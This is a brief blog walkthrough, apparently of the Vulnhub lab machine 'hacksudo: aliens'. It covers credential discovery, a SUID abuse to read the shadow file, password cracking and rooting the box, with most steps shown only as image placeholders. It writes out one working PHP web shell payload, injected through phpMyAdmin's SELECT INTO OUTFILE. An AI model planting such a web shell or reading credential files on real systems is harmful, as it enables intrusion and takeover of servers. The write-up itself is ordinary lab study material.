Vulnhub hacksudo: aliens Walkthrough

https://www.vulnhub.com/entry/hacksudo-aliens,676/


Scan ports.

图片.png


Scan port 80.

图片.png


In /backup/mysql.bak, found credentials.

图片.png


Log in phpmyadmin at port  9000 using this credentials. Create a shell php.

SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/shell.php"



Get reverse shell.

图片.png


Check SUID files.

图片.png


Use date to read shadow.

图片.png


Crack hacksudo's passwd using john.

图片.png


Log inssh  as hacksudo, check SUID files again.

图片.png


Get root.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2023年11月    »
12345
6789101112
13141516171819
20212223242526
27282930
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.3